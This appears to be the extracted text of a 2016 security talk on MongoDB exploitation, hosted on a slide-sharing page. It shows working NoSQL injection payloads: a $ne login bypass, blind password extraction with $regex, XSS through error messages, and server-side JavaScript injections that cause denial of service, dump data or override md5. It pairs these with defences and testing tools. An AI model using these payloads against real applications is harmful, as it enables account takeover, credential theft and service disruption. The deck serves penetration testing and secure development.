NoSQL: NoInjections or NoSecurity

Size: px

Start display at page:

Download "NoSQL: NoInjections or NoSecurity"

Opal Stephens
6 years ago
Views:

1 NoSQL: NoInjections or NoSecurity A Guide to MongoDB Exploitation Stark Riedesel Oct 2016

Create/Read/Update/Delete (CRUD) Data Aggregation (sum/average/group by/etc.

2 What is Document Database (NoSQL) Documents = JSON Schema-free Nested documents (No JOINs) BSON for efficiency Complex Query Language Create/Read/Update/Delete (CRUD) Data Aggregation (sum/average/group by/etc.) Full Text Search Map/Reduce (BigData) JavaScript Query Environment database code execution :)

3 Why (Most) Popular NoSQL database Open source (as of 2009) Easy to get started No tables or columns No data types Just plain JSON objects MEAN stack Easy to setup and use Not always a good thing Source:

4 Stack MongoDB Database/JSON store Express.JS Web server Angular.JS Client-side app code Node.JS Server-side app code Full-Stack JavaScript JavaScript everywhere JSON everywhere Minimal data-conversions Often: API-based apps

5 Out of the Box Insecurity By default: No authentication No access control No encryption At rest Or in transit Never, ever, expose to the internet

Out of the Box Insecurity By default: No authentication No access control No encryption Source: https://securityintelligence.

6 Out of the Box Insecurity By default: No authentication No access control No encryption Source: At rest Or in transit Never, ever, expose to the internet Source: Source:

7 Out of the Box Insecurity Source:

8 MongoDB Injection Attacks Network attacks are obvious But, can we leverage the SQL Injection?

9 MongoDB Injection Attacks Network attacks are obvious But, can we leverage the SQL Injection? Mongo says no:

10 MongoDB Injection Attacks Network attacks are obvious But, can we leverage the SQL Injection? Mongo says no: But

11 Query Selectors Typical query might look like: Product.find({ id: req.query.product_id})

12 Query Selectors Just JSON! Typical query might look like: Product.find({ id: req.query.product_id}) More complex query might look like: Product.find({ price: { $lt: req.query.price}}) Operators include: $lt $gt $eq $ne $regex (and many more)

13 Query Selector Injection Query to Inject: User.find({ username: req.query.username, password: req.query.password})

14 Query Selector Injection Query to Inject: Injection: User.find({ username: req.query.username, password: req.query.password}) Resulting Query: User.find({ username: admin, password: {$ne: }})

15 Demo Time (v1) Demonstration of Query Injections

16 Password Extraction By using the $regex operator, we can extract passwords: password[$regex]=^a 401 Unauthorized password[$regex]=^b 401 Unauthorized password[$regex]=^c 401 Unauthorized password[$regex]=^d 401 Unauthorized password[$regex]=^e 401 Unauthorized password[$regex]=^f 200 OK password[$regex]=^fa 401 Unauthorized password[$regex]=^fb 401 Unauthorized password[$regex]=^fc 401 Unauthorized password[$regex]=^fo 200 OK password[$regex]=^foo$ 200 OK

17 Bonus: XSS Vector Displaying MongoDB error messages is BAD User.findOne({ username: req.query.username, password: req.query.password}, function(error, user) { if (error) return res.send(error); else return res.send( Logged in as: +user.username); }});

18 Bonus: XSS Vector Injection: password[$<script>alert( XSS );</script>]=

19 Demo Time (v2) Advanced Query Injections

20 Only You Can Prevent Query Selector Injections Validate/Sanitize your inputs. I know you know but do your developers know? But I thought ORMs prevent Injections MEAN is young (Almost) no libraries do this by default User.findOne({ username: String(req.query.username), password: String(req.query.password)});

21 Advanced MongoDB Exploitation Time for some good old JavaScript RCE

22 Server Side JavaScript (SSJS) Execution Executed in the context of the Mongo server Operator: $where Customer.find({ $where: this.credits == this.debits }) User.find({ $where: this.password == MD5( +req.query.password+ ) }) Aggregations Group (aka GROUP BY) Used to create custom aggregations Map/Reduce (aka BigData) Used to perform complex logic server-side

23 SSJS Injection User-supplied data -> JavaScript function -> RCE Same issue as traditional SQL injection User.find({ $where: this.password == MD5( +req.query.password+ ) }) Arbitrary JS code, but sandboxed (versions >2.4) Cannot write/modify data Cannot access global db object Cannot access other collections

24 Anatomy of a SSJS Injection ;return 1==1;}// - Roughly equivalent to SQLi: OR 1=1 ;return this.username== admin ;}// ;while(1);return 1==1;}// ;sleep(1000);return 1==1;}// ;assert(false,tojson(this));return 1==1;}//

The Global Namespace Source: https://docs.mongodb.

25 The Global Namespace Source: Documentation: 31 functions vs Reality: ~100 functions/properties Interesting: Able to read recent JavaScript clauses via the _funcs# properties Scary: Able to modify JS built-in functions var global = Function('return this')(); printjson(object.getownpropertynames(global));

26 SSJS Injection Attack Patterns Error injection (dump objects) assert(false, tojson(this)) Error injection (XSS) DoS assert(false, <script>alert( xss );</script> ) while(1); Blind Injections if(str[0]== a ){sleep(100);}

27 Advanced SSJS Injection Attack Patterns Taint the global namespace: var global = Function('return this')(); global.date=function(){ assert(false,tojson(eval( obj ))); }; return 1=1;}// Disrupt security functionality var global = Function('return this')(); global.md5=function(x){ return x; }; return 1=1;}// Dump recent code execution var global = Function('return this')(); assert(false,tojson(global._funcs1)); return 1=1;}//

28 Demo Time (v3) This time with more code execution!

29 Preventing SSJS Injection Disable scripting entirely: --noscripting Just don t have user input in JS code Validate Validate Validate Scoped Variables????

30 Preventing SSJS Injection Disable scripting entirely: --noscripting Just don t have user input in JS code Validate Validate Validate Scoped Variables???? Yes, but no major ORM supports this yet var bson = require('bson'); var ssjs = new bson.code( (this.credits - this.debits) > amount", {amount: req.query.amount} ); mycollection.find( { $where: ssjs} );

31 State of MongoDB Most deployments don t do network stuff right Apps/Libraries haven t learned lessons from SQL injection Web frameworks assist us build query objects JavaScript injection is scary

32 State of MongoDB Most deployments don t do network stuff right Security Testing Tools Apps/Libraries haven t learned lessons from SQL injection Web frameworks assist us build query objects JavaScript injection is scary Burp Suite: Good SSJS detection NoSQLMap: Outdated/Limited for SSJS; good for network stuff Pretty much nothing scans for query selector injection

NoSQL Injection SEC642. Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques S

NoSQL Injection SEC642. Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques S SEC642 Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques S NoSQL Injection Copyright 2012-2018 Justin Searle and Adrien de Beaupré All Rights Reserved Version D01_01 About